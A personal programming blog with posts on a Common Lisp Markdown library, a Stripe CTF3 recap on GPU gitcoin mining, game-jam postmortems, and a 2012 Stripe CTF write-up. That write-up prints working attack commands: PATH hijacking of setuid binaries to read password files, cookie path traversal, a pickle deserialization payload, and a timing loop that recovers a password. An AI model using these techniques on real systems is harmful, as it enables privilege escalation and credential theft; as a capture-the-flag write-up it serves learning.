[insert blog here]
Blogging againSat, 28 Jun 2014 00:00:00 CDT

Trying to get started blogging again, so finally uploaded some old posts that had been waiting on me to tweak the colorization a bit, and some info about recent 3bmd changes.

3bmd updates

3bmd is a Markdown processor implemented in Common Lisp, with various extensions.

Thanks to Vsevolod Dyomkin, it now has an extension to support some of the PHP Markdown Extra table format, so

| Left  | Center Aligned  | Right |
| :------------ |:---------------:| -----:|
| *marked up*      | some wordy text | 123 |
| plain | **centered** | 4 |

renders as

Left Center Aligned Right
marked up some wordy text 123
plain centered 4

Unlike the original PHP Markdown Extra tables, the | are required on both sides of the table.

Thanks to Gábor Melis, 3bmd can also output markdown, for example after making modifications to the parsed document.

Unfortunately the internal parse tree is still pretty ugly and not an officially supported API yet, so expect it to change at some point.

Stripe CTF 3Thu, 20 Feb 2014 00:00:00 CST

Stripe had their third "Capture the Flag" at the end of January (more info here and here). Didn't do as well on this one as on the first one, but at least managed to get second on the 'gitcoin' level.

A combination of factors kept me from finishing:

  • Sleep deficit from the microcorruption.com CTF the week before.
  • Trying to use CL for all the problems and trying to use unfamiliar/unfinished libraries.
  • Not liking the format.
    While the problems were interesting, the presentation as "trying to build something useful/important" instead of "trying to find and exploit flaws" as in CTF1 or microcorruption made it feel sort of odd to be hacking together the ugliest thing that could possibly work, or to be focused exclusively on speed at the expense of generality or maintainability.
  • The biggest problem though, was just focusing too much on gitcoin mining :)
Level 0

Level 0 was effectively just a simple (buggy) spell checker. Read whitespace delimited character sequences, then downcase them and look them up in a dictionary. Finally, print the character sequence, surrounding it in <> if not found in the dictionary, and preserving the whitespace.

Just reading the dictionary into a hash table was good enough to pass and get to #201 on the leaderboard. Unfortunately someone mentioned the fast solution (Bloom filters) in IRC, and from what I understand the fastest solutions were limited mostly by the timing wrapper, so I wasn't as motivated to try any of the ideas I had for improving my solution (like memory mapping the dictionary file and doing a binary search directly in that, or indexing it in advance and only loading pieces).

Level 1

Level 1 is where I spent most of my time. The goal was to write a miner for a git-based cryptocoin called "gitcoin". To mine a gitcoin, you have to successfully push a commit with a hash less than a specified "difficulty" value. To pass the level, you have to get a commit before a set of bots push a commit, which happens every 90 seconds or so. After that, there is an option to play against other players.

The provided example is a shell script that just calls git commands to check hashes. Considering that at the initial difficulty the odds of getting a valid hash are about 50% after 11 million tries, starting a new process for every try is probably a bad idea.

The obvious first optimization is just to move the hashing loop into a single process. That takes a bit of work, since you need to replicate the way git hashes commits correctly, then make sure you can pass the data to git (or some git wrapper library) so it gets the same hash when it creates the actual commit.

Originally, I was calling git commit-tree and trying to get the GIT_AUTHOR_* and GIT_COMMITTER_* environment variables set properly so git would create the same commit I had hashed. That worked, but eventually switched to the easier method of just doing git hash-object -wt commit

I think with just doing hashes in CL (using ironclad for SHA1), I was at around 150k hash/sec, enough to beat the bots to finish the level, but not enough for the PvP bonus round.

After the basic hashing and git operations are working, the next step is to take advantage of the fact that SHA1 hashes in blocks and each commit starts with the same header. We can hash just the header, then save the state of the hash at that point and reuse it for each attempt, which speeds up the hashing by 3-4x. That and some other optimizations eventually got the pure-CL miner to about 650-700k hash/sec, at which point it was time to break out the OpenCL.

I had written part of a bitcoin miner as a test for my CL OpenCL library, so I could reuse some of that. I just needed to replace the double SHA256 kernel with a single round of SHA1, and connect it to git instead of a bitcoin client.

Due to lack of sleep and not remembering how the old code worked, that probably took longer than it should have. I made lots of simple mistakes like miscounting the number of characters to put in the commit message to get an even number of SHA1 blocks, or miscounting the number of bits in the message to put in the SHA1 header.

Once that worked though, it was hashing at 950MHash/sec on a GTX 780, quite a bit faster than the CPU miners (fast C miners were up to ~5-10MH/s per core, some running on a few machines). Eventually the other GPU miner woke up, and made it obvious that I needed to work on my git code, since I was losing despite having about 5x the hash rate.

I was originally running single threaded, so I would stop hashing while waiting for git operations to complete, which took from a second or 2 for a pull up to 5 or 6 seconds for a successful push. Switching to multiple threads allowed continuing to hash while checking for new commits on server, keeping effective hash rate closer to peak. It also allowed starting to work on the next coin while pushing, which is a pretty strong advantage when the difficulty is low enough (as it was at that point) to find multiple coins before a push finishes.

It took a few tries to get the threading working right though. I originally over-thought things and divided up the work poorly, leading to some races.

For a while I stopped mining and later was only mining for one 15-minute round per hour, due to not liking the way the scoring was working out with a wide range of hash rates. The scoring was a combination of some points per round for everyone that got at least 1 coin, and ELO ranking between the people that got coins. The problem with that is that people who manage to get 1 or 2 coins get penalized in the ELO part, possibly lowering their overall score, while people with lower hash rate that didn't get any coins stay at the same score.

The organizers increased the per-round bonus partway through to help avoid the problems with ELO only affecting people fast enough to get coins, which seems to have helped. Unfortunately I didn't think through the implications of the increased bonus, so left my miner running only 1 round in 4 overnight and missed out on a bunch of points.

Eventually a few other people finished GPU miners and some people with access to clusters (or EC2 instances) were running a few hundred MH/sec on CPUs, so I switched my miner to use binary nonces in the commit message rather than converting to ascii in the OpenCL kernel. That improved hash rate to over 1GH/sec, and I added in the AMD A8-5600K APU on a different machine for another 160MH/sec until it locked up the machine.

From there it was just a question of people looking for more GPUs or more machines, and waiting for the final score. I tried adding a HD 6870, but unfortunately the machine with a free PCI-E slot also had sata connectors in the way, so my final hash rate was only 1.2GH/s. One of the people with a cluster was around 1.1GH/s for a while, but ran into heat problems, and the final winner was running 4.2GH/s at the end.

Level 2

Level 2 is where I started running into problems with my choice of language and libraries. The task for the level was to write proxy for some web services to filter out a DDOS attack.

The first problem I ran into is that one of the libraries I wanted to use built a shared library, but the paths changed between the build and test environments, so it couldn't find the library. They fixed the paths quickly once I figured what the problem was, but it took a while to figure out what was happening.

After that, I ran into problems getting the various libraries I tried to use working together, and one of them wasn't as finished as I'd thought it was. In the end, I gave up and just modified the example node.js script.

Rejecting requests from IPs that had more than 4 requests in the last 200 ms or that had been rejected a few times already, unless the server was idle, was enough to pass but didn't score very well.

Level 3

The task for level 3 was a "code search" web service, which would index a set of files on demand, then respond to queries with a set of files containing the requested word.

Level 3 is where I gave up, after again running into problems with my code not running on the test server and not feeling like trying to debug it.

Stripe CTFMon, 12 Mar 2012 00:00:00 CDT

Stripe recently presented a set of challenges to "capture the flag" by finding and exploiting security vulnerabilities in a series of setuid binaries and web services. Now that the CTF is officially over, here is a summary of how I captured the flag:

Level 1

Level 1 is pretty easy, a setuid binary calls another program (date) without specifying a path, so we just need to create our own date program (or shell script), make it executable, then run the provided binary with our date first on the PATH.

$ echo /bin/cat /home/level02/.password > date
$ chmod +x date
$ PATH=. /levels/level01
Level 2

Level 2 gives us a PHP script that uses the contents of a cookie to construct a filename, then sends the contents of the file back to the user. We just need to send a relative path to the password file as the value of that cookie.

$ curl -u level02 --digest \
       --cookie user_details="../../home/level03/.password" \
Level 3

Level 3 gets a bit harder. It gives another SUID binary, with a disabled function to call an arbitrary program. Unfortunately it neglects to check for negative numbers when validating input, so we can fall off the front of its function pointer table instead of going past the end. With a bit of poking around in gdb and careful choice of index, we can hit the other argument passed to the program, and store a pointer to the run function there, at which point we are back to calling another program without specifying a path, as in level 01.

$ echo 00000000: 5b870408 | xxd -r > run
$ echo /bin/cat /home/level04/.password > `cat run`
$ chmod +x `cat run`
$ PATH=. /levels/level03 -28 `cat run`
Level 4

Level 4 is another setuid binary, this time with a pretty obvious buffer overflow.

char buf[1024];
strcpy(buf, str);

A quick web search turns up a nice review of why buffer overflows are bad, including a program to automate generating a string to pass to the program in order to exploit the overflow.

Unfortunately, the CTF binaries are 32bit, and the system doesn't seem to be set up to compile 32 bit binaries, so the exploit program can't guess the proper stack address... back to gdb to get an address and hard code it, at which point we run into another problem: "Address Space Layout Randomization."

Attempting to disable ASLR using setarch didn't seem to help, so back to the web to find a more recent example of why buffer overflows are bad, even with ASLR. The ret2eax strategy from that paper combined with the previous code lets us use the buffer overflow to run a shell as level05, at which point we can just read the password directly.

Level 5

Level 5 gives us a Python web service to exploit. Looking around in the source leads to a suspicious regex: '^type: (.*?); data: (.*?); job: (.*?)$'. A quick test with ; job: in the data passed to the service verifies it does in fact parse it incorrectly, so we can pass arbitrary data to the job field.

Tracing through the code more carefully, the job value is a class instance serialized/deserialized using pickle, which apparently should not be used with untrusted data. If we can make the deserialization code execute arbitrary commands, we just need to have it copy the password somewhere we can read it:

$ chmod o+w .
$ curl localhost:9020 -d "; job: cos
(S'cp /home/level06/.password `pwd`/ ; chmod 777 `pwd`/.password'
$ cat .password
Level 6

Level 6 goes back to another setuid binary, this time without any obvious way to inject our own code into it to take control. Luckily it makes the mistake of doing something as soon as it finds a mismatch between the guess and the real password, so if we can figure out a way to detect that, we can try 1 character at a time and see which one it doesn't complain about.

Since it also makes the mistake of printing something every time it checks a character, we can arrange to kill it after it makes a certain number of checks by sending the output to a pipe, then closing the other end of the pipe.

$ mkfifo foo
$ head -c 34 foo & sleep 0.1 ; /levels/level06 /home/the-flag/.password aa 2> foo

The above lets level06 print 34 characters ("Welcome to the password checker!", a newline, and one "."), then closes the reader on the pipe, killing level06 with SIGPIPE. If the first character was wrong, it prints the Ha ha, your password is incorrect! message before being killed on the . from the second character.

Adding in a quick loop lets us test a range of characters reasonably quickly:

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c34 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password "$a"a 2> foo
> sleep 0.1
> done

then just scroll up to see which didn't give an error ("t"), add that to the beginning of the guess, and repeat to find the next character

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c35 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password t"$a"a 2> foo
> sleep 0.1
> done

and so on until we get to 5 for character 24, and no match for character 25, at which point we have the whole password theflagl0eFTtT5oi0nOTxO5.

LGDC 2010/Summer / ILGE 2010 entry postmortemThu, 08 Jul 2010 00:00:00 CDT

Ran out of energy before getting much more done than the last progress report, so the actual '7-day game' part didn't go too well.

Final results after 7 days (+ a few minutes extra to make it use more than just 2 sprites), move with arrow keys/wasd/hjkl:

What went wrong?

  • Working on non-game stuff:

    I spent a few days of the scheduled 7 working on slime/parenscript stuff, which while probably more useful long-term, didn't really do much towards getting a game done in 7 days.

    Another chunk of time was eaten by working on my blog software, I probably would have been better off just using some hosted blog service somewhere, and only worry about maintaining my own software for things that need it (mostly presenting code nicely, and even that might have been better handled at the editor level)

  • R&D instead of getting work done:

    The next big chunk of wasted time was spent on messing with some ideas for generating infinite ground tiles, which probably wouldn't have matched the pixel art sprites I was using even if it had worked.

  • Not knowing JS well enough:

    In particular, I still haven't figured out a good way to handle OO stuff, and most of what I could find on the subject only agreed to the extent of disliking the built-in new Foo() idiom.

  • Scope:

    While I hadn't really planned in enough detail to say that the scope was too large, a more focused plan might have helped avoid getting sidetracked onto the random terrain texture generation stuff.

  • Deployment:

    One small downside of working on browser code from SLIME is that doesn't lead quite as naturally to having a set of files ready to put on a website. Probably will want some combination of telling ASDF to compile the parenscript files to .js, and writing out the .js files when compiling a file from SLIME.

What went right?

  • SLIME + Parenscript:

    Being able to use SLIME while working on code running in the browser is much nicer than having to constantly reload the browser(s) after every change. It takes fewer keystrokes to see the results of a change, and maintaining state makes it much easier to test things incrementally.

  • Free art:

    While I like the idea of procedural content, a short project like this doesn't really have time to spend on developing experimental tools. Having art available with a nice license makes it much easier to get started quickly, and seeing little people wandering around is much more motivating than little boxes or other "programmer art" would be.

  • <canvas>:

    Aside from some minor annoyances like not being able to portably stretch the sprites without smoothing, the HTML canvas seems reasonably easy to use, and seemed to perform fairly well.

LGDC day 6Thu, 01 Jul 2010 00:00:00 CDT

Now that I have somewhere to post it, here is a status report on what I've been working on for ILGE 2010.

What I have so far looks like this :

I keep getting distracted by side projects like hooking slime up to the browser by way of parenscript, so probably won't actually have a game within the originally scheduled 7 days.

I'll probably do a postmortem after that, and then decide whether to extend the project further for IGLE, or do something else for it.